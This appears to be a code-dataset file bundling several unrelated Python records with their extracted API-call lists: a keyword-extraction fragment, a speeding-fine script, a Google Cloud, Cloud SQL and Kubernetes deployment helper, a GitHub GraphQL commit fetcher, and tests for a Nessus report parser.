df['keywords'] = df['keywords'].apply(lambda x: [lemma.lemmatize(y) for y in x])
df = df.explode('keywords')
df.dropna(subset=['keywords'], inplace=True)
return df
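# --- Editor's note: hedged usage sketch with made-up survey text. -------------
# Each input row is exploded into one lemmatised RAKE keyword phrase per row;
# pandas is only needed for this demonstration, not by the module itself.
if __name__ == '__main__':
    import pandas as pd
    sample = pd.DataFrame({'answer': ['I could not find the assignment deadline']})
    print(add_keywords(sample, 'answer')[['answer', 'keywords']])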
| [
"rake_nltk.Rake",
"nltk.stem.WordNetLemmatizer",
"nltk.download"
] | [((121, 145), 'nltk.download', 'nltk.download', (['"""wordnet"""'], {}), "('wordnet')\n", (134, 145), False, 'import nltk\n'), ((182, 201), 'nltk.stem.WordNetLemmatizer', 'WordNetLemmatizer', ([], {}), '()\n', (199, 201), False, 'from nltk.stem import WordNetLemmatizer\n'), ((207, 260), 'rake_nltk.Rake', 'Rake', ([], {'stopwords': 'stopwords', 'min_length': '(1)', 'max_length': '(4)'}), '(stopwords=stopwords, min_length=1, max_length=4)\n', (211, 260), False, 'from rake_nltk import Rake\n')] |
from termcolor import colored
v = float(input('Velocidade do carro, em Km/h: '))
if v > 80:
print(colored('Ultrapassou a velocidade de 80Km/h, multa de: R${}'.format(7 * (v - 80)), 'red'))
else:
print(colored('Tenha um bom dia, dirija com seguraça!', 'green'))
| [
"termcolor.colored"
] | [((210, 268), 'termcolor.colored', 'colored', (['"""Tenha um bom dia, dirija com seguraça!"""', '"""green"""'], {}), "('Tenha um bom dia, dirija com seguraça!', 'green')\n", (217, 268), False, 'from termcolor import colored\n')] |
import json
import subprocess
import sys
from abc import abstractmethod
from pathlib import Path
from pprint import pformat
from time import sleep
from typing import Sequence, MutableMapping, Union, Any, Mapping, MutableSequence
import pymysql
from googleapiclient.discovery import build
from googleapiclient.errors import HttpError
from pymysql import Connection
class SqlExecutor:
def __init__(self, svc: 'ExternalServices') -> None:
super().__init__()
self._svc: 'ExternalServices' = svc
@abstractmethod
def open(self) -> None:
raise NotImplementedError()
@abstractmethod
def close(self) -> None:
raise NotImplementedError()
@abstractmethod
def execute_sql(self, sql: str):
raise NotImplementedError()
@abstractmethod
def execute_sql_script(self, path: str):
raise NotImplementedError()
class ProxySqlExecutor(SqlExecutor):
def __init__(self, svc: 'ExternalServices', project_id: str, instance: str, password: str, region: str) -> None:
super().__init__(svc=svc)
self._project_id: str = project_id
self._instance: str = instance
self._username: str = 'root'
self._password: str = password
self._region: str = region
self._proxy_process: subprocess.Popen = None
self._connection: Connection = None
def open(self) -> None:
self._svc.update_gcp_sql_user(project_id=self._project_id, instance=self._instance, password=self._password)
self._proxy_process: subprocess.Popen = \
subprocess.Popen([f'/usr/local/bin/cloud_sql_proxy',
f'-instances={self._project_id}:{self._region}:{self._instance}=tcp:3306',
f'-credential_file=/deployster/service-account.json'])
try:
self._proxy_process.wait(2)
raise Exception(f"could not start Cloud SQL Proxy!")
except subprocess.TimeoutExpired:
pass
print(f"Connecting to MySQL...", file=sys.stderr)
self._connection: Connection = pymysql.connect(host='localhost',
port=3306,
user=self._username,
password=self._password,
db='INFORMATION_SCHEMA',
charset='utf8mb4',
cursorclass=pymysql.cursors.DictCursor)
def close(self) -> None:
try:
self._connection.close()
finally:
self._proxy_process.terminate()
def execute_sql(self, sql: str) -> Sequence[dict]:
with self._connection.cursor() as cursor:
cursor.execute(sql)
return [row for row in cursor.fetchall()]
def execute_sql_script(self, path: str):
command = \
f"/usr/bin/mysql --user={self._username} " \
f" --password={self._password} " \
f" --host=127.0.0.1 information_schema < {path}"
subprocess.run(command, shell=True, check=True)
def region_from_zone(zone: str) -> str:
return zone[0:zone.rfind('-')]
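# Editor's sketch (hypothetical zone name): region_from_zone('europe-west1-b')
# returns 'europe-west1' by stripping everything from the last '-' onwards.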
class ExternalServices:
def __init__(self) -> None:
super().__init__()
self._gcp_service_cache: MutableMapping[str, Any] = {}
def _get_gcp_service(self, service_name, version) -> Any:
service_key = service_name + '_' + version
if service_key not in self._gcp_service_cache:
self._gcp_service_cache[service_key] = build(serviceName=service_name, version=version)
return self._gcp_service_cache[service_key]
def find_gcp_project(self, project_id: str) -> Union[None, dict]:
filter: str = f"name:{project_id}"
result: dict = self._get_gcp_service('cloudresourcemanager', 'v1').projects().list(filter=filter).execute()
if 'projects' not in result:
return None
projects: Sequence[dict] = result['projects']
if len(projects) == 0:
return None
elif len(projects) > 1:
raise Exception(f"too many GCP projects matched filter '{filter}'")
else:
return projects[0]
def find_gcp_project_billing_info(self, project_id: str) -> Union[None, dict]:
try:
service = self._get_gcp_service('cloudbilling', 'v1')
return service.projects().getBillingInfo(name=f"projects/{project_id}").execute()
except HttpError as e:
if e.resp.status == 404:
return None
else:
raise
def find_gcp_project_enabled_apis(self, project_id: str) -> Sequence[str]:
service = self._get_gcp_service('servicemanagement', 'v1')
result: dict = service.services().list(consumerId=f'project:{project_id}').execute()
if 'services' in result:
return [api['serviceName'] for api in result['services']]
else:
return []
def create_gcp_project(self, body: dict) -> None:
service = self._get_gcp_service('cloudresourcemanager', 'v1').projects()
self.wait_for_gcp_resource_manager_operation(service.create(body=body).execute())
def update_gcp_project(self, project_id: str, body: dict) -> None:
service = self._get_gcp_service('cloudresourcemanager', 'v1').projects()
self.wait_for_gcp_resource_manager_operation(service.update(projectId=project_id, body=body).execute())
def update_gcp_project_billing_info(self, project_id: str, body: dict) -> None:
service = self._get_gcp_service('cloudbilling', 'v1').projects()
service.updateBillingInfo(name=f'projects/{project_id}', body=body).execute()
def enable_gcp_project_api(self, project_id: str, api: str) -> None:
self.wait_for_gcp_service_manager_operation(
self._get_gcp_service('servicemanagement', 'v1').services().enable(serviceName=api, body={
'consumerId': f"project:{project_id}"
}).execute())
def disable_gcp_project_api(self, project_id: str, api: str) -> None:
self.wait_for_gcp_service_manager_operation(
self._get_gcp_service('servicemanagement', 'v1').services().disable(serviceName=api, body={
'consumerId': f"project:{project_id}"
}).execute())
def wait_for_gcp_service_manager_operation(self, result):
if 'response' in result:
return result['response']
operations_service = self._get_gcp_service('servicemanagement', 'v1').operations()
while True:
sleep(5)
result = operations_service.get(name=result['name']).execute()
if 'done' in result and result['done']:
if 'response' in result:
return result['response']
elif 'error' in result:
raise Exception("ERROR: %s" % json.dumps(result['error']))
else:
raise Exception("UNKNOWN ERROR: %s" % json.dumps(result))
def wait_for_gcp_resource_manager_operation(self, result):
if 'response' in result:
return result['response']
operations_service = self._get_gcp_service('cloudresourcemanager', 'v1').operations()
while True:
sleep(5)
result = operations_service.get(name=result['name']).execute()
if 'done' in result and result['done']:
if 'response' in result:
return result['response']
elif 'error' in result:
raise Exception("ERROR: %s" % json.dumps(result['error']))
else:
raise Exception("UNKNOWN ERROR: %s" % json.dumps(result))
def find_service_account(self, project_id: str, email: str):
try:
sa_resource_name: str = f"projects/-/serviceAccounts/{email}"
return self._get_gcp_service('iam', 'v1').projects().serviceAccounts().get(name=sa_resource_name).execute()
except HttpError as e:
if e.resp.status == 404:
return None
else:
raise
def create_service_account(self, project_id: str, email: str, display_name: str):
self._get_gcp_service('iam', 'v1').projects().serviceAccounts().create(name=f"projects/{project_id}", body={
'accountId': email[0:email.find('@')],
'serviceAccount': {
'displayName': display_name if display_name else email[0:email.find('@')].capitalize()
}
}).execute()
def update_service_account_display_name(self, project_id: str, email: str, display_name: str, etag: str):
sa_resource_name: str = f"projects/-/serviceAccounts/{email}"
self._get_gcp_service('iam', 'v1').projects().serviceAccounts().update(name=sa_resource_name, body={
'displayName': display_name if display_name else email[0:email.find('@')].capitalize(),
'etag': etag
}).execute()
def get_project_iam_policy(self, project_id: str):
service = self._get_gcp_service('cloudresourcemanager', 'v1')
return service.projects().getIamPolicy(resource=project_id, body={}).execute()
def update_project_iam_policy(self, project_id: str, etag: str, bindings: Sequence[dict], verbose: bool = False):
existing_policy: dict = self.get_project_iam_policy(project_id=project_id)
print(f"About to update IAM policy for project '{project_id}'.\n"
f"For reference, due to the sensitivity of this operation, here is the current IAM policy bindings:\n"
f"\n"
f"{pformat(existing_policy['bindings'])}\n"
f"\n"
f"The new IAM policy bindings will be:\n"
f"{pformat(bindings)}")
service = self._get_gcp_service('cloudresourcemanager', 'v1')
service.projects().setIamPolicy(resource=project_id, body={
'policy': {
'bindings': bindings,
'etag': etag
}
}).execute()
def get_gcp_sql_allowed_tiers(self, project_id: str) -> Mapping[str, str]:
sql_service = self._get_gcp_service('sqladmin', 'v1beta4')
return {tier['tier']: tier
for tier in sql_service.tiers().list(project=project_id).execute()['items']
if tier['tier'].startswith('db-')}
def get_gcp_sql_allowed_flags(self) -> Mapping[str, str]:
service = self._get_gcp_service('sqladmin', 'v1beta4')
return {flag['name']: flag for flag in service.flags().list(databaseVersion='MYSQL_5_7').execute()['items']}
def get_gcp_sql_instance(self, project_id: str, instance_name: str):
# using "instances().list(..)" because "get" throws 403 when instance does not exist
# also, it seems the "filter" parameter for "list" does not work; so we fetch all instances and filter here
result = self._get_gcp_service('sqladmin', 'v1beta4').instances().list(project=project_id).execute()
if 'items' in result:
for instance in result['items']:
if instance['name'] == instance_name:
return instance
return None
def get_gcp_sql_users(self, project_id: str, instance_name: str) -> Sequence[dict]:
users_service = self._get_gcp_service('sqladmin', 'v1beta4').users()
result = users_service.list(project=project_id, instance=instance_name).execute()
users: MutableSequence[dict] = []
if 'items' in result:
for user in result['items']:
users.append({'name': user['name'], 'password': user['password'] if 'password' in user else None})
return users
def create_gcp_sql_user(self, project_id: str, instance_name: str, user_name: str, password: str) -> None:
users_service = self._get_gcp_service('sqladmin', 'v1beta4').users()
result = users_service.insert(project=project_id, instance=instance_name, body={
'name': user_name,
'password': password
}).execute()
def create_gcp_sql_instance(self, project_id: str, body: dict) -> None:
sql_service = self._get_gcp_service('sqladmin', 'v1beta4')
try:
op = sql_service.instances().insert(project=project_id, body=body).execute()
self.wait_for_gcp_sql_operation(project_id=project_id, operation=op)
except HttpError as e:
status = e.resp.status
if status == 409:
raise Exception(f"failed creating SQL instance, possibly due to instance name reuse (you can't "
f"reuse an instance name for a week after its deletion)") from e
else:
raise
def patch_gcp_sql_instance(self, project_id: str, instance: str, body: dict) -> None:
service = self._get_gcp_service('sqladmin', 'v1beta4')
op = service.instances().patch(project=project_id, instance=instance, body=body).execute()
self.wait_for_gcp_sql_operation(project_id=project_id, operation=op)
def update_gcp_sql_user(self, project_id: str, instance: str, password: str) -> None:
service = self._get_gcp_service('sqladmin', 'v1beta4')
op = service.users().update(project=project_id, instance=instance, host='%', name='root', body={
'password': password
}).execute()
self.wait_for_gcp_sql_operation(project_id=project_id, operation=op)
def create_gcp_sql_executor(self, **kwargs) -> SqlExecutor:
return ProxySqlExecutor(svc=self,
project_id=kwargs['project_id'],
instance=kwargs['instance'],
password=kwargs['password'],
region=kwargs['region'])
def wait_for_gcp_sql_operation(self, project_id: str, operation: dict, timeout=60 * 30):
operations_service = self._get_gcp_service('sqladmin', 'v1beta4').operations()
interval = 5
counter = 0
while True:
sleep(interval)
counter = counter + interval
result = operations_service.get(project=project_id, operation=operation['name']).execute()
if 'status' in result and result['status'] == 'DONE':
if 'error' in result:
raise Exception("ERROR: %s" % json.dumps(result['error']))
else:
return result
if counter >= timeout:
raise Exception(f"Timed out waiting for Google Cloud SQL operation: {json.dumps(result,indent=2)}")
def get_gke_cluster(self, project_id: str, zone: str, name: str):
clusters_service = self._get_gcp_service('container', 'v1').projects().zones().clusters()
try:
return clusters_service.get(projectId=project_id, zone=zone, clusterId=name).execute()
except HttpError as e:
if e.resp.status == 404:
return None
else:
raise
def get_gke_cluster_node_pool(self, project_id: str, zone: str, name: str, pool_name: str):
clusters_service = self._get_gcp_service('container', 'v1').projects().zones().clusters()
try:
return clusters_service.nodePools().get(projectId=project_id,
zone=zone,
clusterId=name,
nodePoolId=pool_name).execute()
except HttpError as e:
if e.resp.status == 404:
return None
else:
raise
def get_gke_server_config(self, project_id: str, zone: str) -> dict:
service = self._get_gcp_service('container', 'v1')
return service.projects().zones().getServerconfig(projectId=project_id, zone=zone).execute()
def create_gke_cluster(self, project_id: str, zone: str, body: dict, timeout: int = 60 * 15):
clusters_service = self._get_gcp_service('container', 'v1').projects().zones().clusters()
op = clusters_service.create(projectId=project_id, zone=zone, body=body).execute()
self.wait_for_gke_zonal_operation(project_id=project_id, zone=zone, operation=op, timeout=timeout)
def update_gke_cluster_master_version(self,
project_id: str,
zone: str,
name: str,
version: str,
timeout: int = 60 * 15):
clusters_service = self._get_gcp_service('container', 'v1').projects().zones().clusters()
body = {'masterVersion': version}
op = clusters_service.master(projectId=project_id, zone=zone, clusterId=name, body=body).execute()
self.wait_for_gke_zonal_operation(project_id=project_id, zone=zone, operation=op, timeout=timeout)
def update_gke_cluster(self, project_id: str, zone: str, name: str, body: dict, timeout: int = 60 * 15):
clusters_service = self._get_gcp_service('container', 'v1').projects().zones().clusters()
op = clusters_service.update(projectId=project_id, zone=zone, clusterId=name, body=body).execute()
self.wait_for_gke_zonal_operation(project_id=project_id, zone=zone, operation=op, timeout=timeout)
def update_gke_cluster_legacy_abac(self, project_id: str, zone: str, name: str, body: dict, timeout: int = 60 * 15):
clusters_service = self._get_gcp_service('container', 'v1').projects().zones().clusters()
op = clusters_service.legacyAbac(projectId=project_id, zone=zone, clusterId=name, body=body).execute()
self.wait_for_gke_zonal_operation(project_id=project_id, zone=zone, operation=op, timeout=timeout)
def update_gke_cluster_monitoring(self, project_id: str, zone: str, name: str, body: dict, timeout: int = 60 * 15):
clusters_service = self._get_gcp_service('container', 'v1').projects().zones().clusters()
op = clusters_service.monitoring(projectId=project_id, zone=zone, clusterId=name, body=body).execute()
self.wait_for_gke_zonal_operation(project_id=project_id, zone=zone, operation=op, timeout=timeout)
def update_gke_cluster_logging(self, project_id: str, zone: str, name: str, body: dict, timeout: int = 60 * 15):
clusters_service = self._get_gcp_service('container', 'v1').projects().zones().clusters()
op = clusters_service.logging(projectId=project_id, zone=zone, clusterId=name, body=body).execute()
self.wait_for_gke_zonal_operation(project_id=project_id, zone=zone, operation=op, timeout=timeout)
def update_gke_cluster_addons(self, project_id: str, zone: str, name: str, body: dict, timeout: int = 60 * 15):
clusters_service = self._get_gcp_service('container', 'v1').projects().zones().clusters()
op = clusters_service.addons(projectId=project_id, zone=zone, clusterId=name, body=body).execute()
self.wait_for_gke_zonal_operation(project_id=project_id, zone=zone, operation=op, timeout=timeout)
def create_gke_cluster_node_pool(self,
project_id: str,
zone: str,
name: str,
node_pool_body: dict,
timeout: int = 60 * 15):
pools_service = self._get_gcp_service('container', 'v1').projects().zones().clusters().nodePools()
op = pools_service.create(projectId=project_id,
zone=zone,
clusterId=name,
body={"nodePool": node_pool_body}).execute()
self.wait_for_gke_zonal_operation(project_id=project_id, zone=zone, operation=op, timeout=timeout)
def update_gke_cluster_node_pool(self,
project_id: str,
zone: str,
cluster_name: str,
pool_name: str,
body: dict, timeout: int = 60 * 15):
pools_service = self._get_gcp_service('container', 'v1').projects().zones().clusters().nodePools()
op = pools_service.update(projectId=project_id,
zone=zone,
clusterId=cluster_name,
nodePoolId=pool_name,
body=body).execute()
self.wait_for_gke_zonal_operation(project_id=project_id, zone=zone, operation=op, timeout=timeout)
def update_gke_cluster_node_pool_management(self,
project_id: str,
zone: str,
cluster_name: str,
pool_name: str,
body: dict, timeout: int = 60 * 15):
pools_service = self._get_gcp_service('container', 'v1').projects().zones().clusters().nodePools()
op = pools_service.setManagement(projectId=project_id,
zone=zone,
clusterId=cluster_name,
nodePoolId=pool_name,
body=body).execute()
self.wait_for_gke_zonal_operation(project_id=project_id, zone=zone, operation=op, timeout=timeout)
def update_gke_cluster_node_pool_autoscaling(self,
project_id: str,
zone: str,
cluster_name: str,
pool_name: str,
body: dict, timeout: int = 60 * 15):
pools_service = self._get_gcp_service('container', 'v1').projects().zones().clusters().nodePools()
op = pools_service.autoscaling(projectId=project_id,
zone=zone,
clusterId=cluster_name,
nodePoolId=pool_name,
body=body).execute()
self.wait_for_gke_zonal_operation(project_id=project_id, zone=zone, operation=op, timeout=timeout)
def wait_for_gke_zonal_operation(self, project_id: str, zone: str, operation: dict,
timeout: int = 60 * 15):
operations_service = self._get_gcp_service('container', 'v1').projects().zones().operations()
interval = 5
counter = 0
while True:
sleep(interval)
counter = counter + interval
result = operations_service.get(projectId=project_id, zone=zone, operationId=operation['name']).execute()
if 'status' in result and result['status'] == 'DONE':
if 'error' in result:
raise Exception("ERROR: %s" % json.dumps(result['error']))
else:
return result
if counter >= timeout:
raise Exception(f"Timed out waiting for GKE zonal operation: {json.dumps(result,indent=2)}")
def generate_gcloud_access_token(self, json_credentials_file: Path) -> str:
# first, make gcloud use our service account
command = f"gcloud auth activate-service-account --key-file={json_credentials_file}"
subprocess.run(command, check=True, shell=True)
# extract our service account's GCP access token
process = subprocess.run(f"gcloud auth print-access-token", check=True, shell=True, stdout=subprocess.PIPE)
return process.stdout.decode('utf-8').strip()
def get_gcp_compute_regional_ip_address(self, project_id: str, region: str, name: str) -> Union[None, dict]:
try:
return self._get_gcp_service('compute', 'v1').addresses().get(project=project_id,
region=region,
address=name).execute()
except HttpError as e:
if e.resp.status == 404:
return None
else:
raise
def create_gcp_compute_regional_ip_address(self, project_id: str, region: str, name: str, timeout: int = 60 * 5):
addresses_service = self._get_gcp_service('compute', 'v1').addresses()
result = addresses_service.insert(project=project_id,
region=region,
body={'name': name}).execute()
self.wait_for_gcp_compute_regional_operation(project_id=project_id,
region=region,
operation=result,
timeout=timeout)
def wait_for_gcp_compute_regional_operation(self,
project_id: str,
region: str,
operation: dict,
timeout: int = 60 * 5):
operations_service = self._get_gcp_service('compute', 'v1').regionOperations()
interval = 5
counter = 0
while True:
sleep(interval)
counter = counter + interval
result = operations_service.get(project=project_id, region=region, operation=operation['name']).execute()
if 'status' in result and result['status'] == 'DONE':
if 'error' in result:
raise Exception("ERROR: %s" % json.dumps(result['error']))
else:
return result
if counter >= timeout:
raise Exception(
f"Timed out waiting for Google Compute regional operation: {json.dumps(result,indent=2)}")
def get_gcp_compute_global_ip_address(self, project_id: str, name: str) -> Union[None, dict]:
try:
return self._get_gcp_service('compute', 'v1').globalAddresses().get(project=project_id,
address=name).execute()
except HttpError as e:
if e.resp.status == 404:
return None
else:
raise
def create_gcp_compute_global_ip_address(self, project_id: str, name: str, timeout: int = 60 * 5):
addresses_service = self._get_gcp_service('compute', 'v1').globalAddresses()
result = addresses_service.insert(project=project_id, body={'name': name}).execute()
self.wait_for_gcp_compute_global_operation(project_id=project_id, operation=result, timeout=timeout)
def wait_for_gcp_compute_global_operation(self, project_id: str, operation: dict, timeout: int = 60 * 5):
operations_service = self._get_gcp_service('compute', 'v1').globalOperations()
interval = 5
counter = 0
while True:
sleep(interval)
counter = counter + interval
result = operations_service.get(project=project_id, operation=operation['name']).execute()
if 'status' in result and result['status'] == 'DONE':
if 'error' in result:
raise Exception("ERROR: %s" % json.dumps(result['error']))
else:
return result
if counter >= timeout:
raise Exception(f"Timed out waiting for Google Compute global operation: {json.dumps(result,indent=2)}")
def find_k8s_cluster_object(self, manifest: dict) -> Union[None, dict]:
cmd = f"kubectl get {manifest['kind']} {manifest['metadata']['name']} --ignore-not-found=true --output=json"
process = subprocess.run(f"{cmd}", shell=True, check=True, stdout=subprocess.PIPE)
return json.loads(process.stdout) if process.stdout else None
def find_k8s_namespace_object(self, manifest: dict) -> Union[None, dict]:
metadata: dict = manifest['metadata']
kind: str = manifest['kind']
name: str = metadata['name']
namespace: str = metadata['namespace']
cmd: str = f"kubectl get --namespace {namespace} {kind} {name} --ignore-not-found=true --output=json"
process = subprocess.run(f"{cmd}", shell=True, check=True, stdout=subprocess.PIPE)
return json.loads(process.stdout) if process.stdout else None
def create_k8s_object(self, manifest: dict, timeout: int = 60 * 5, verbose: bool = False) -> None:
if verbose:
print(f"Creating Kubernetes object from:\n{json.dumps(manifest, indent=2)}")
subprocess.run(f"kubectl create --save-config=true -f -",
input=json.dumps(manifest),
encoding='utf-8',
check=True,
timeout=timeout,
shell=True)
def update_k8s_object(self, manifest: dict, timeout: int = 60 * 5, force: bool = False, verbose: bool = False) \
-> None:
if verbose:
print(f"Updating Kubernetes object from:\n{json.dumps(manifest, indent=2)}")
subprocess.run(f"kubectl apply --force={'true' if force else 'false'} -f -",
input=json.dumps(manifest),
encoding='utf-8',
check=True,
timeout=timeout,
shell=True)
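# --- Editor's note: hedged usage sketch (hypothetical project/instance names). -
# Typical flow for running SQL against a Cloud SQL instance through the proxy;
# requires valid GCP credentials mounted where cloud_sql_proxy expects them.
#
#   svc = ExternalServices()
#   executor = svc.create_gcp_sql_executor(project_id='my-project',
#                                           instance='my-instance',
#                                           password='********',
#                                           region='europe-west1')
#   executor.open()
#   try:
#       rows = executor.execute_sql('SELECT 1')
#   finally:
#       executor.close()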
| [
"json.loads",
"subprocess.Popen",
"subprocess.run",
"pymysql.connect",
"json.dumps",
"time.sleep",
"pprint.pformat",
"googleapiclient.discovery.build"
] | [((1571, 1761), 'subprocess.Popen', 'subprocess.Popen', (["[f'/usr/local/bin/cloud_sql_proxy',\n f'-instances={self._project_id}:{self._region}:{self._instance}=tcp:3306',\n f'-credential_file=/deployster/service-account.json']"], {}), "([f'/usr/local/bin/cloud_sql_proxy',\n f'-instances={self._project_id}:{self._region}:{self._instance}=tcp:3306',\n f'-credential_file=/deployster/service-account.json'])\n", (1587, 1761), False, 'import subprocess\n'), ((2089, 2273), 'pymysql.connect', 'pymysql.connect', ([], {'host': '"""localhost"""', 'port': '(3306)', 'user': 'self._username', 'password': 'self._password', 'db': '"""INFORMATION_SCHEMA"""', 'charset': '"""utf8mb4"""', 'cursorclass': 'pymysql.cursors.DictCursor'}), "(host='localhost', port=3306, user=self._username, password=\n self._password, db='INFORMATION_SCHEMA', charset='utf8mb4', cursorclass\n =pymysql.cursors.DictCursor)\n", (2104, 2273), False, 'import pymysql\n'), ((3194, 3241), 'subprocess.run', 'subprocess.run', (['command'], {'shell': '(True)', 'check': '(True)'}), '(command, shell=True, check=True)\n', (3208, 3241), False, 'import subprocess\n'), ((23825, 23872), 'subprocess.run', 'subprocess.run', (['command'], {'check': '(True)', 'shell': '(True)'}), '(command, check=True, shell=True)\n', (23839, 23872), False, 'import subprocess\n'), ((23949, 24050), 'subprocess.run', 'subprocess.run', (['f"""gcloud auth print-access-token"""'], {'check': '(True)', 'shell': '(True)', 'stdout': 'subprocess.PIPE'}), "(f'gcloud auth print-access-token', check=True, shell=True,\n stdout=subprocess.PIPE)\n", (23963, 24050), False, 'import subprocess\n'), ((28278, 28350), 'subprocess.run', 'subprocess.run', (['f"""{cmd}"""'], {'shell': '(True)', 'check': '(True)', 'stdout': 'subprocess.PIPE'}), "(f'{cmd}', shell=True, check=True, stdout=subprocess.PIPE)\n", (28292, 28350), False, 'import subprocess\n'), ((28795, 28867), 'subprocess.run', 'subprocess.run', (['f"""{cmd}"""'], {'shell': '(True)', 'check': '(True)', 'stdout': 'subprocess.PIPE'}), "(f'{cmd}', shell=True, check=True, stdout=subprocess.PIPE)\n", (28809, 28867), False, 'import subprocess\n'), ((3688, 3736), 'googleapiclient.discovery.build', 'build', ([], {'serviceName': 'service_name', 'version': 'version'}), '(serviceName=service_name, version=version)\n', (3693, 3736), False, 'from googleapiclient.discovery import build\n'), ((6735, 6743), 'time.sleep', 'sleep', (['(5)'], {}), '(5)\n', (6740, 6743), False, 'from time import sleep\n'), ((7441, 7449), 'time.sleep', 'sleep', (['(5)'], {}), '(5)\n', (7446, 7449), False, 'from time import sleep\n'), ((14230, 14245), 'time.sleep', 'sleep', (['interval'], {}), '(interval)\n', (14235, 14245), False, 'from time import sleep\n'), ((23032, 23047), 'time.sleep', 'sleep', (['interval'], {}), '(interval)\n', (23037, 23047), False, 'from time import sleep\n'), ((25799, 25814), 'time.sleep', 'sleep', (['interval'], {}), '(interval)\n', (25804, 25814), False, 'from time import sleep\n'), ((27509, 27524), 'time.sleep', 'sleep', (['interval'], {}), '(interval)\n', (27514, 27524), False, 'from time import sleep\n'), ((28366, 28392), 'json.loads', 'json.loads', (['process.stdout'], {}), '(process.stdout)\n', (28376, 28392), False, 'import json\n'), ((28883, 28909), 'json.loads', 'json.loads', (['process.stdout'], {}), '(process.stdout)\n', (28893, 28909), False, 'import json\n'), ((29246, 29266), 'json.dumps', 'json.dumps', (['manifest'], {}), '(manifest)\n', (29256, 29266), False, 'import json\n'), ((29781, 29801), 'json.dumps', 'json.dumps', 
(['manifest'], {}), '(manifest)\n', (29791, 29801), False, 'import json\n'), ((9798, 9834), 'pprint.pformat', 'pformat', (["existing_policy['bindings']"], {}), "(existing_policy['bindings'])\n", (9805, 9834), False, 'from pprint import pformat\n'), ((9932, 9949), 'pprint.pformat', 'pformat', (['bindings'], {}), '(bindings)\n', (9939, 9949), False, 'from pprint import pformat\n'), ((29117, 29147), 'json.dumps', 'json.dumps', (['manifest'], {'indent': '(2)'}), '(manifest, indent=2)\n', (29127, 29147), False, 'import json\n'), ((29633, 29663), 'json.dumps', 'json.dumps', (['manifest'], {'indent': '(2)'}), '(manifest, indent=2)\n', (29643, 29663), False, 'import json\n'), ((14546, 14573), 'json.dumps', 'json.dumps', (["result['error']"], {}), "(result['error'])\n", (14556, 14573), False, 'import json\n'), ((14751, 14779), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (14761, 14779), False, 'import json\n'), ((23361, 23388), 'json.dumps', 'json.dumps', (["result['error']"], {}), "(result['error'])\n", (23371, 23388), False, 'import json\n'), ((23559, 23587), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (23569, 23587), False, 'import json\n'), ((26130, 26157), 'json.dumps', 'json.dumps', (["result['error']"], {}), "(result['error'])\n", (26140, 26157), False, 'import json\n'), ((26363, 26391), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (26373, 26391), False, 'import json\n'), ((27825, 27852), 'json.dumps', 'json.dumps', (["result['error']"], {}), "(result['error'])\n", (27835, 27852), False, 'import json\n'), ((28035, 28063), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (28045, 28063), False, 'import json\n'), ((7049, 7076), 'json.dumps', 'json.dumps', (["result['error']"], {}), "(result['error'])\n", (7059, 7076), False, 'import json\n'), ((7159, 7177), 'json.dumps', 'json.dumps', (['result'], {}), '(result)\n', (7169, 7177), False, 'import json\n'), ((7755, 7782), 'json.dumps', 'json.dumps', (["result['error']"], {}), "(result['error'])\n", (7765, 7782), False, 'import json\n'), ((7865, 7883), 'json.dumps', 'json.dumps', (['result'], {}), '(result)\n', (7875, 7883), False, 'import json\n')] |
import logging
from typing import List, Optional
from src.constants import PR_FILES
from src.data.github.graphql.models import RawCommit
from src.data.github.graphql.template import (
GraphQLError,
GraphQLErrorAuth,
GraphQLErrorMissingNode,
GraphQLErrorTimeout,
get_template,
)
def get_commits(
node_ids: List[str], access_token: Optional[str] = None
) -> List[Optional[RawCommit]]:
"""
    Gets commit data for the given node ids from the GitHub GraphQL API
:param access_token: GitHub access token
:param node_ids: List of node ids
:return: List of commits
"""
if PR_FILES == 0: # type: ignore
query = {
"variables": {"ids": node_ids},
"query": """
query getCommits($ids: [ID!]!) {
nodes(ids: $ids) {
... on Commit {
additions
deletions
changedFiles
url
}
}
}
""",
}
else:
query = {
"variables": {"ids": node_ids, "first": PR_FILES},
"query": """
query getCommits($ids: [ID!]!, $first: Int!) {
nodes(ids: $ids) {
... on Commit {
additions
deletions
changedFiles
url
associatedPullRequests(first: 1) {
nodes {
changedFiles
additions
deletions
files(first: $first) {
nodes {
path
additions
deletions
}
}
}
}
}
}
}
""",
}
try:
raw_commits = get_template(query, access_token)["data"]["nodes"]
except GraphQLErrorMissingNode as e:
return (
get_commits(node_ids[: e.node], access_token)
+ [None]
+ get_commits(node_ids[e.node + 1 :], access_token)
)
except (GraphQLErrorAuth, GraphQLErrorTimeout):
return [None for _ in node_ids]
except GraphQLError as e:
logging.exception(e)
return [None for _ in node_ids]
out: List[Optional[RawCommit]] = []
for raw_commit in raw_commits:
try:
if "associatedPullRequests" not in raw_commit:
raw_commit["associatedPullRequests"] = {"nodes": []}
out.append(RawCommit.parse_obj(raw_commit))
except Exception as e:
logging.exception(e)
out.append(None)
return out
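# --- Editor's note: hedged usage sketch (placeholder node id and token). ------
# Failed or missing nodes come back as None, so filter before use:
#
#   commits = get_commits(['<commit-node-id>'], access_token='<github-token>')
#   valid = [c for c in commits if c is not None]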
| [
"src.data.github.graphql.models.RawCommit.parse_obj",
"src.data.github.graphql.template.get_template",
"logging.exception"
] | [((2516, 2536), 'logging.exception', 'logging.exception', (['e'], {}), '(e)\n', (2533, 2536), False, 'import logging\n'), ((2124, 2157), 'src.data.github.graphql.template.get_template', 'get_template', (['query', 'access_token'], {}), '(query, access_token)\n', (2136, 2157), False, 'from src.data.github.graphql.template import GraphQLError, GraphQLErrorAuth, GraphQLErrorMissingNode, GraphQLErrorTimeout, get_template\n'), ((2817, 2848), 'src.data.github.graphql.models.RawCommit.parse_obj', 'RawCommit.parse_obj', (['raw_commit'], {}), '(raw_commit)\n', (2836, 2848), False, 'from src.data.github.graphql.models import RawCommit\n'), ((2893, 2913), 'logging.exception', 'logging.exception', (['e'], {}), '(e)\n', (2910, 2913), False, 'import logging\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
test_ness
----------------------------------
Tests for `ness` module.
"""
import pytest
import ness
def test_parse_report():
report = ness.from_file('sample.nessus')
assert len(report.get('hosts')) == 1
print(report)
def test_parse_from_file():
with pytest.raises(FileNotFoundError):
ness.from_file('not-existant-path')
| [
"pytest.raises",
"ness.from_file"
